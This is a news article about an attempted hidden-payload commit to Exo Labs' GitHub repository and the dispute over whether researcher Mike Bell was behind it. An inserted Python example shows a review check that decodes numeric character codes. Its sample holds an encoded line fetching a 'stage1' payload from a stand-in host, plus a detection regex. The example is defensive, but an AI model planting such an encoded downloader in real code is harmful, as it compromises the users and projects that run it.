Executives at artificial intelligence and machine learning startup Exo Labs reported that an unknown person tried to alter the code of their project in its GitHub repository.

The code submitted by the unknown programmer had an innocent-looking header, but to make the fragment harder to review, the attacker had converted it into a numeric equivalent. Analysis of the code before it was sent to the repository showed that it attempted to connect to a server with a known address to download the first-stage payload of the attack. The payload itself was not found at the specified address: the server returned a “404” error.
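As an added illustration (not code from Exo Labs or from the incident), a pre-merge check can decode integer sequences found in a submitted change and show the reviewer what they spell out, without executing anything. It assumes the project is Python and that the "numeric equivalent" was a list of decimal character codes; the sample change, the function names and the `example.invalid` host are constructed.

```python
import ast
import re

# Assumption: the hidden text is stored as decimal character codes in a list or tuple.
MIN_RUN = 8  # ignore short integer sequences such as version tuples
SUSPICIOUS = re.compile(r"https?://|\bimport\b|\bexec\b|\beval\b|\bsubprocess\b|\bsocket\b")

def _int_values(node):
    """Return the ints in a list/tuple literal, or None if it is not all ints."""
    if not isinstance(node, (ast.List, ast.Tuple)):
        return None
    vals = []
    for elt in node.elts:
        if isinstance(elt, ast.Constant) and type(elt.value) is int:
            vals.append(elt.value)
        else:
            return None
    return vals

def find_encoded_text(source):
    """Return (line, decoded_text, suspicious) for integer runs that decode to printable ASCII."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        vals = _int_values(node)
        if not vals or len(vals) < MIN_RUN:
            continue
        # Accept only tab, newline, carriage return and printable ASCII.
        if all(v in (9, 10, 13) or 32 <= v < 127 for v in vals):
            text = "".join(map(chr, vals))
            findings.append((node.lineno, text, bool(SUSPICIOUS.search(text))))
    return findings

# Constructed sample of a submitted change (not the code from the incident).
_hidden = "import urllib.request; urllib.request.urlopen('https://payload.example.invalid/stage1')"
SAMPLE = (
    "# minor cleanup\n"
    "VERSION = (1, 2, 3)\n"
    f"_t = {[ord(c) for c in _hidden]}\n"
)

if __name__ == "__main__":
    for line, text, bad in find_encoded_text(SAMPLE):
        print(f"line {line}: decodes to {text!r} suspicious={bad}")
```

The check parses the change with `ast` only, so the decoded text is shown to the reviewer but never run.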

After reviewing the incident, researchers discovered that the domain and GitHub accounts associated with the attack pointed to cybersecurity expert Mike Bell from Texas. He denied any involvement in the attack and said it was an attempt to smear his good name. The white hat (ethical) hacker emphasized that there was in fact no payload in the attack scheme, and the corresponding GitHub account was deleted. The attacker also gained access to a domain name belonging to Bell – the expert attributed the incident to the fact that he may have angered someone.
